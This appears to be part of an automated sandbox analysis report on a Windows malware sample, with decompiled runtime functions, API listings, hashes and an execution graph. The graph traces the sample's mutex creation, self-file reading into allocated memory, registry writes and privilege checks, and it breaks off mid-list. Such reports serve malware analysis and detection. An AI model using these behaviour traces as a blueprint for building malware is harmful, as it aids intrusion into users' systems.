                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 003812FB
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00381305
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                            • API String ID: 2506810119-3471509342
                                                                                                                                                                                                                                                                            • Opcode ID: ed8537d70cb24a92258e33aaec3dabdb60e5a59df989c7e57e459bc9caa41471
                                                                                                                                                                                                                                                                            • Instruction ID: 1874357500718441cce0ff4666aa6e4b10201d91f892cf8fb300b4f101cac9ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed8537d70cb24a92258e33aaec3dabdb60e5a59df989c7e57e459bc9caa41471
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21314171A00318EFDB26EF9A9D8599EBBFCEB85710B1144A6F504EB211D6708E42CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                                                            			E0037A9D1(signed int _a4) {
                                                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                                                            				WCHAR* _t22;
                                                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t9 = _a4;
                                                                                                                                                                                                                                                                            				_t25 = 0x40dd20 + _t9 * 4;
                                                                                                                                                                                                                                                                            				_t24 =  *_t25;
                                                                                                                                                                                                                                                                            				if(_t24 == 0) {
                                                                                                                                                                                                                                                                            					_t22 =  *(0x3c7a50 + _t9 * 4);
                                                                                                                                                                                                                                                                            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                                                                                                                                                                                                            					if(_t27 != 0) {
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						 *_t25 = _t27;
                                                                                                                                                                                                                                                                            						if( *_t25 != 0) {
                                                                                                                                                                                                                                                                            							FreeLibrary(_t27);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t13 = _t27;
                                                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                                                            						return _t13;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t15 = GetLastError();
                                                                                                                                                                                                                                                                            					if(_t15 != 0x57) {
                                                                                                                                                                                                                                                                            						_t27 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                                                                                                                                                                                                            						_t27 = _t15;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_t27 != 0) {
                                                                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						 *_t25 = _t15 | 0xffffffff;
                                                                                                                                                                                                                                                                            						_t13 = 0;
                                                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t4 = _t24 + 1; // 0x1f0d8c9d
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				return  ~_t4 & _t24;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x0037a9d6
                                                                                                                                                                                                                                                                            0x0037a9da
                                                                                                                                                                                                                                                                            0x0037a9e1
                                                                                                                                                                                                                                                                            0x0037a9e5
                                                                                                                                                                                                                                                                            0x0037a9f3
                                                                                                                                                                                                                                                                            0x0037aa09
                                                                                                                                                                                                                                                                            0x0037aa0d
                                                                                                                                                                                                                                                                            0x0037aa36
                                                                                                                                                                                                                                                                            0x0037aa38
                                                                                                                                                                                                                                                                            0x0037aa3c
                                                                                                                                                                                                                                                                            0x0037aa3f
                                                                                                                                                                                                                                                                            0x0037aa3f
                                                                                                                                                                                                                                                                            0x0037aa45
                                                                                                                                                                                                                                                                            0x0037aa47
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037aa48
                                                                                                                                                                                                                                                                            0x0037aa0f
                                                                                                                                                                                                                                                                            0x0037aa18
                                                                                                                                                                                                                                                                            0x0037aa27
                                                                                                                                                                                                                                                                            0x0037aa1a
                                                                                                                                                                                                                                                                            0x0037aa1d
                                                                                                                                                                                                                                                                            0x0037aa23
                                                                                                                                                                                                                                                                            0x0037aa23
                                                                                                                                                                                                                                                                            0x0037aa2b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037aa2d
                                                                                                                                                                                                                                                                            0x0037aa30
                                                                                                                                                                                                                                                                            0x0037aa32
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037aa32
                                                                                                                                                                                                                                                                            0x0037aa2b
                                                                                                                                                                                                                                                                            0x0037a9e7
                                                                                                                                                                                                                                                                            0x0037a9ec
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0037A978,?,00000000,00000000,00000000,?,0037AB75,00000006,FlsSetValue), ref: 0037AA03
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0037A978,?,00000000,00000000,00000000,?,0037AB75,00000006,FlsSetValue,003C7FD0,FlsSetValue,00000000,00000364,?,00379F22), ref: 0037AA0F
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0037A978,?,00000000,00000000,00000000,?,0037AB75,00000006,FlsSetValue,003C7FD0,FlsSetValue,00000000), ref: 0037AA1D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                            • Opcode ID: ebc7f4e95f4476885b0910662b219d283394e62e141b9a2685a730e1edb70af4
                                                                                                                                                                                                                                                                            • Instruction ID: eeadfaa20b17da8fedc783d0b08e3dfaccfb07f8a8fb2a1ab86f952a1dc03ce1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebc7f4e95f4476885b0910662b219d283394e62e141b9a2685a730e1edb70af4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0001FC36611B22AFD7734B68AD44E6B775C9F857A1B224620F90ED7140D738DC14C7D2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0037FABA
                                                                                                                                                                                                                                                                              • Part of subcall function 003800FF: ___AdjustPointer.LIBCMT ref: 00380149
                                                                                                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0037FAD1
                                                                                                                                                                                                                                                                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 0037FAE3
                                                                                                                                                                                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0037FB07
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2633735394-0
                                                                                                                                                                                                                                                                            • Opcode ID: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                                            • Instruction ID: aaafe944338c75672402f8ef7196463b8df0c78f2df46b90a6aaaa01473338ab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F401D332000109BFCF63AF55CD41EDA3BAAFF48754F158165F91C6A121D37AE861EBA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E0037F596() {
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				E003809E7();
                                                                                                                                                                                                                                                                            				E0038097B();
                                                                                                                                                                                                                                                                            				if(E003806BE() != 0) {
                                                                                                                                                                                                                                                                            					_t4 = E0037F6D6(_t8, __eflags);
                                                                                                                                                                                                                                                                            					__eflags = _t4;
                                                                                                                                                                                                                                                                            					if(_t4 != 0) {
                                                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						E003806FA();
                                                                                                                                                                                                                                                                            						goto L1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					L1:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x0037f596
                                                                                                                                                                                                                                                                            0x0037f59b
                                                                                                                                                                                                                                                                            0x0037f5a7
                                                                                                                                                                                                                                                                            0x0037f5ac
                                                                                                                                                                                                                                                                            0x0037f5b1
                                                                                                                                                                                                                                                                            0x0037f5b3
                                                                                                                                                                                                                                                                            0x0037f5be
                                                                                                                                                                                                                                                                            0x0037f5b5
                                                                                                                                                                                                                                                                            0x0037f5b5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037f5b5
                                                                                                                                                                                                                                                                            0x0037f5a9
                                                                                                                                                                                                                                                                            0x0037f5a9
                                                                                                                                                                                                                                                                            0x0037f5ab
                                                                                                                                                                                                                                                                            0x0037f5ab

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0037F596
                                                                                                                                                                                                                                                                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0037F59B
                                                                                                                                                                                                                                                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0037F5A0
                                                                                                                                                                                                                                                                              • Part of subcall function 003806BE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 003806CF
                                                                                                                                                                                                                                                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0037F5B5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1761009282-0
                                                                                                                                                                                                                                                                            • Opcode ID: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                                            • Instruction ID: 3aee2b229cc14185d45a37c6d2cd757f9ba72d265f2bf23445c8afb6ffeb9243
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74C04C651443109D2DBB3EB161572AD17007CE37D4B8191E1F8496F513AE4E482E5A37
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:11.6%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:36.7%
                                                                                                                                                                                                                                                                            Signature Coverage:14.7%
                                                                                                                                                                                                                                                                            Total number of Nodes:1913
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:34
                                                                                                                                                                                                                                                                            execution_graph 13393 c7dccc 13394 c7dcd8 CallCatchBlock 13393->13394 13418 c7e593 13394->13418 13397 c7dcdf 13398 c7dd08 13397->13398 13456 c7df6f IsProcessorFeaturePresent 13397->13456 13405 c7dd47 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 13398->13405 13429 c7d4f6 13398->13429 13401 c7d49a _abort 5 API calls 13401->13405 13402 c7dd27 CallCatchBlock 13403 c7dda7 13433 c7e08a 13403->13433 13405->13403 13460 c7c4bb 13405->13460 13406 c7ddad 13437 c71ed0 13406->13437 13419 c7e59c 13418->13419 13467 c7e2de IsProcessorFeaturePresent 13419->13467 13423 c7e5ad 13428 c7e5b1 13423->13428 13478 c818d7 13423->13478 13426 c7e5c8 13426->13397 13428->13397 13430 c7d50d 13429->13430 13431 c7de3e TranslatorGuardHandler 5 API calls 13430->13431 13432 c7d537 13431->13432 13432->13401 13432->13402 13614 c7f290 13433->13614 13436 c7e0b0 13436->13406 13438 c72039 13437->13438 13439 c71f2b 13437->13439 13440 c7238a WideCharToMultiByte CreateFileA 13438->13440 13441 c72198 13438->13441 13442 c7205d 13439->13442 13443 c71f3c 13439->13443 13444 c7260c ExitProcess 13440->13444 13634 c85750 13441->13634 13442->13438 13447 c720b5 CreateMutexA 13442->13447 13616 c73a60 13443->13616 13656 c885e0 13447->13656 13448 c72204 13648 c87550 13448->13648 13453 c72180 13453->13438 13454 c7237c 13454->13444 13457 c7df85 ___scrt_fastfail 13456->13457 13458 c7e02d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13457->13458 13459 c7e077 13458->13459 13459->13397 13461 c7c4e3 try_get_function 13460->13461 13462 c7d941 _GetRangeOfTrysToCheck 13460->13462 13461->13403 13463 c79e50 pre_c_initialization 38 API calls 13462->13463 13466 c7d952 13463->13466 13464 c7a85b _abort 38 API calls 13465 c7d97c 13464->13465 13466->13464 13468 c7e304 13467->13468 13469 c7f596 13468->13469 13470 c7f59b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 13469->13470 13489 c806be 13470->13489 13473 c7f5a9 13473->13423 13475 c7f5b1 13476 c7f5bc 13475->13476 13503 c806fa 13475->13503 13476->13423 13544 c823ff 13478->13544 13481 c7f5bf 13482 c7f5d9 13481->13482 13483 c7f5c8 13481->13483 13482->13428 13484 c7f709 ___vcrt_uninitialize_ptd 6 API calls 13483->13484 13485 c7f5cd 13484->13485 13486 c806fa ___vcrt_uninitialize_locks DeleteCriticalSection 13485->13486 13487 c7f5d2 13486->13487 13610 c809b5 13487->13610 13490 c806c7 13489->13490 13492 c806f0 13490->13492 13493 c7f5a5 13490->13493 13507 c80935 13490->13507 13494 c806fa ___vcrt_uninitialize_locks DeleteCriticalSection 13492->13494 13493->13473 13495 c7f6d6 13493->13495 13494->13493 13525 c8084a 13495->13525 13497 c7f6e0 13502 c7f6eb 13497->13502 13530 c808f8 13497->13530 13499 c7f6f9 13500 c7f706 13499->13500 13535 c7f709 13499->13535 13500->13475 13502->13475 13504 c80705 13503->13504 13506 c80724 13503->13506 13505 c8070f DeleteCriticalSection 13504->13505 13505->13505 13505->13506 13506->13473 13512 c80729 13507->13512 13509 c8094f 13510 c8096c InitializeCriticalSectionAndSpinCount 13509->13510 13511 c80958 13509->13511 13510->13511 13511->13490 13515 c80759 13512->13515 13517 c8075d try_get_function 13512->13517 13513 c8077d 13516 c80789 GetProcAddress 13513->13516 13513->13517 13515->13513 13515->13517 13518 c807c9 13515->13518 13516->13517 13517->13509 13519 c807f1 LoadLibraryExW 13518->13519 13520 c807e6 13518->13520 13521 c8080d GetLastError 13519->13521 13522 c80825 13519->13522 13520->13515 13521->13522 13523 c80818 LoadLibraryExW 13521->13523 13522->13520 13524 c8083c FreeLibrary 13522->13524 13523->13522 13524->13520 13526 c80729 try_get_function 5 API calls 13525->13526 13527 c80864 13526->13527 13528 c8087c TlsAlloc 13527->13528 13529 c8086d 13527->13529 13529->13497 13531 c80729 try_get_function 5 API calls 13530->13531 13532 c80912 13531->13532 13533 c8092c TlsSetValue 13532->13533 13534 c80921 13532->13534 13533->13534 13534->13499 13536 c7f713 13535->13536 13538 c7f719 13535->13538 13539 c80884 13536->13539 13538->13502 13540 c80729 try_get_function 5 API calls 13539->13540 13541 c8089e 13540->13541 13542 c808b5 TlsFree 13541->13542 13543 c808aa 13541->13543 13542->13543 13543->13538 13545 c8241c 13544->13545 13548 c82418 13544->13548 13545->13548 13550 c8237d 13545->13550 13546 c7de3e TranslatorGuardHandler 5 API calls 13547 c7e5ba 13546->13547 13547->13426 13547->13481 13548->13546 13551 c82389 CallCatchBlock 13550->13551 13562 c7b1a4 EnterCriticalSection 13551->13562 13553 c82390 13563 c82038 13553->13563 13555 c823ae 13587 c823ca 13555->13587 13556 c8239f 13556->13555 13576 c82211 GetStartupInfoW 13556->13576 13559 c823bf CallCatchBlock 13559->13545 13562->13553 13564 c82044 CallCatchBlock 13563->13564 13565 c82068 13564->13565 13566 c82051 13564->13566 13590 c7b1a4 EnterCriticalSection 13565->13590 13568 c79a46 _free 20 API calls 13566->13568 13569 c82056 13568->13569 13570 c7998a pre_c_initialization 26 API calls 13569->13570 13572 c82060 CallCatchBlock 13570->13572 13571 c820a0 13598 c820c7 13571->13598 13572->13556 13573 c82074 13573->13571 13591 c81f89 13573->13591 13577 c8222e 13576->13577 13578 c822c0 13576->13578 13577->13578 13579 c82038 27 API calls 13577->13579 13582 c822c7 13578->13582 13580 c82257 13579->13580 13580->13578 13581 c82285 GetFileType 13580->13581 13581->13580 13583 c822ce 13582->13583 13584 c82311 GetStdHandle 13583->13584 13585 c82379 13583->13585 13586 c82324 GetFileType 13583->13586 13584->13583 13585->13555 13586->13583 13609 c7b1ec LeaveCriticalSection 13587->13609 13589 c823d1 13589->13559 13590->13573 13592 c7a89e _abort 20 API calls 13591->13592 13593 c81f9b 13592->13593 13597 c81fa8 13593->13597 13601 c7aba7 13593->13601 13594 c7a8fb _free 20 API calls 13596 c81ffa 13594->13596 13596->13573 13597->13594 13608 c7b1ec LeaveCriticalSection 13598->13608 13600 c820ce 13600->13572 13602 c7a935 _abort 5 API calls 13601->13602 13603 c7abce 13602->13603 13604 c7abec InitializeCriticalSectionAndSpinCount 13603->13604 13606 c7abd7 13603->13606 13604->13606 13605 c7de3e TranslatorGuardHandler 5 API calls 13607 c7ac03 13605->13607 13606->13605 13607->13593 13608->13600 13609->13589 13611 c809e4 13610->13611 13613 c809be 13610->13613 13611->13482 13612 c809ce FreeLibrary 13612->13613 13613->13611 13613->13612 13615 c7e09d GetStartupInfoW 13614->13615 13615->13436 13617 c73ac0 13616->13617 13620 c71fcd 13616->13620 13659 c72940 13617->13659 13619 c73b16 13665 c71000 13619->13665 13624 c74040 13620->13624 13625 c743eb 13624->13625 13628 c740b6 13624->13628 13626 c74414 CreateFileMappingA 13625->13626 13627 c74369 13625->13627 13626->13627 13627->13438 13628->13627 13690 c73660 13628->13690 13631 c885e0 3 API calls 13632 c74294 13631->13632 13699 c71280 13632->13699 13635 c857c8 13634->13635 13636 c85e0e 13634->13636 13637 c857d9 13635->13637 13638 c85bd2 13635->13638 13636->13448 13704 c71420 13637->13704 13639 c85bf9 13638->13639 13642 c85e57 13638->13642 13639->13636 13640 c85c16 13639->13640 13643 c85cac GetModuleHandleA MultiByteToWideChar 13640->13643 13642->13636 13645 c85ec3 GetModuleFileNameA 13642->13645 13647 c85910 13643->13647 13646 c85eac 13645->13646 13646->13642 13647->13448 13647->13636 13649 c87d67 13648->13649 13655 c722aa 13648->13655 13650 c87dab 13649->13650 13651 c87ebc GetCurrentActCtx 13649->13651 13652 c87dd3 CloseHandle 13650->13652 13650->13655 13651->13655 13653 c885e0 3 API calls 13652->13653 13654 c87eb4 13653->13654 13654->13655 13655->13454 13657 c88792 WideCharToMultiByte ReleaseMutex CreateFileA 13656->13657 13658 c88656 13656->13658 13657->13658 13658->13453 13660 c72d34 13659->13660 13661 c729a4 13659->13661 13660->13661 13662 c72d5d FindFirstFileA GetModuleHandleA 13660->13662 13661->13619 13663 c72630 3 API calls 13662->13663 13664 c72e4a 13663->13664 13664->13619 13666 c71063 13665->13666 13668 c711b1 13665->13668 13666->13668 13679 c883a0 13666->13679 13671 c72630 13668->13671 13669 c7110c 13683 c73370 13669->13683 13672 c726b7 13671->13672 13678 c7269d 13671->13678 13673 c727e4 13672->13673 13674 c72878 ReadFile 13672->13674 13687 c84e80 13673->13687 13675 c72841 13674->13675 13675->13620 13677 c72790 FindNextFileA 13677->13678 13678->13672 13678->13677 13680 c8840d 13679->13680 13681 c883fb 13679->13681 13680->13669 13681->13680 13682 c88572 GetCurrentActCtx 13681->13682 13682->13681 13684 c733eb 13683->13684 13685 c733e0 13683->13685 13684->13668 13685->13684 13686 c7352b SetHandleInformation 13685->13686 13686->13668 13688 c84f0b GetCommandLineA 13687->13688 13689 c84eec 13687->13689 13688->13689 13689->13675 13691 c736c1 13690->13691 13692 c73941 13690->13692 13693 c736e5 13691->13693 13694 c7379f CreateFileMappingA CreateMutexA 13691->13694 13692->13631 13693->13692 13695 c7391b 13693->13695 13696 c72940 5 API calls 13694->13696 13695->13693 13697 c72940 5 API calls 13695->13697 13696->13695 13698 c73a44 13697->13698 13698->13692 13700 c712e9 VirtualAlloc 13699->13700 13702 c71367 13699->13702 13701 c71409 13700->13701 13701->13627 13702->13701 13703 c713a8 SetHandleInformation 13702->13703 13703->13702 13705 c71da7 13704->13705 13706 c71476 13704->13706 13705->13706 13707 c71dc6 CloseHandle 13705->13707 13706->13647 13708 c71e0a 13707->13708 13708->13706 13709 c71e70 GetCurrentProcessId 13708->13709 13709->13706 12234 1173b00 12235 1173b0d 12234->12235 12277 1172ed0 12235->12277 12237 1173b1e GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize 12280 1174510 12237->12280 12239 117400a ExitProcess 12240 1173b54 12240->12239 12298 1175700 12240->12298 12244 1173b9f 12332 1179400 12244->12332 12250 1173be1 12349 1175e00 CreateMutexA GetLastError 12250->12349 12252 1173beb StrStrIA 12350 1171120 12252->12350 12263 1173c92 12398 1175b50 12263->12398 12267 1173df8 12272 1173e30 12267->12272 12438 11778d0 12267->12438 12270 1174020 257 API calls 12270->12272 12271 1173fed Sleep 12271->12272 12272->12270 12272->12271 12275 1173f09 12272->12275 12425 1177970 12272->12425 12275->12272 12276 1173f62 VirtualFree 12275->12276 12442 11742e0 12275->12442 12447 1174020 12275->12447 12276->12275 12470 1173090 GetPEB 12277->12470 12279 1172edf 12279->12237 12281 11747e6 12280->12281 12282 1174528 12280->12282 12281->12240 12282->12281 12283 117455b GetModuleFileNameA CreateFileA 12282->12283 12283->12281 12284 11745a4 GetFileSize 12283->12284 12285 11745c6 VirtualAlloc 12284->12285 12286 11747d0 12284->12286 12285->12286 12288 11745ef ReadFile 12285->12288 12286->12281 12287 11747d9 CloseHandle 12286->12287 12287->12281 12289 1174625 12288->12289 12297 117466f 12288->12297 12290 1174637 FindCloseChangeNotification 12289->12290 12289->12297 12471 11747f0 12290->12471 12291 11747b2 VirtualFree 12291->12286 12294 1174681 VirtualFree 12295 117469f 12294->12295 12296 11747f0 15 API calls 12295->12296 12295->12297 12296->12295 12297->12286 12297->12291 12299 1175717 12298->12299 12300 1173b84 12298->12300 12491 1178f80 12299->12491 12319 1175a00 12300->12319 12306 1175773 12560 1175cd0 12306->12560 12309 11757d1 12310 11757e6 GetAllUsersProfileDirectoryA 12309->12310 12311 11757f9 GetEnvironmentVariableA 12309->12311 12312 1175810 wnsprintfA CreateFileA 12310->12312 12311->12312 12312->12300 12313 1175867 GetFileSize 12312->12313 12314 1175886 VirtualAlloc 12313->12314 12315 1175918 FindCloseChangeNotification 12313->12315 12314->12315 12316 11758ab ReadFile 12314->12316 12315->12300 12317 1175904 VirtualFree 12316->12317 12318 11758e4 12316->12318 12317->12315 12318->12315 12320 1175b44 12319->12320 12321 1175a18 12319->12321 12320->12244 12321->12320 12322 1175a3a lstrcpyA 12321->12322 12585 1175930 12322->12585 12324 1175a62 12325 1175a74 lstrlenA 12324->12325 12325->12320 12326 1175a8c lstrcpyA lstrlenA lstrlenA 12325->12326 12326->12320 12327 1175abf lstrcatA RegCreateKeyExA 12326->12327 12328 1175b16 12327->12328 12329 1175b0a RegCloseKey 12327->12329 12331 1175b25 lstrcpyA 12328->12331 12330 1175b37 lstrlenA 12329->12330 12330->12320 12331->12330 12333 1173bcf 12332->12333 12336 117941a 12332->12336 12338 11799f0 GetCurrentProcess OpenProcessToken 12333->12338 12336->12333 12337 1179502 lstrcpyA CharUpperA 12336->12337 12589 1178bb0 12336->12589 12605 1179650 12336->12605 12337->12336 12339 1179a1f GetTokenInformation 12338->12339 12344 1173bd7 12338->12344 12340 1179b76 CloseHandle 12339->12340 12341 1179a50 GetTokenInformation 12339->12341 12340->12344 12341->12340 12342 1179a85 CreateWellKnownSid EqualSid 12341->12342 12343 1179ad4 CreateWellKnownSid EqualSid 12342->12343 12342->12344 12343->12344 12345 1179b0a CreateWellKnownSid EqualSid 12343->12345 12347 1176060 GetModuleFileNameA 12344->12347 12345->12344 12346 1179b40 CreateWellKnownSid EqualSid 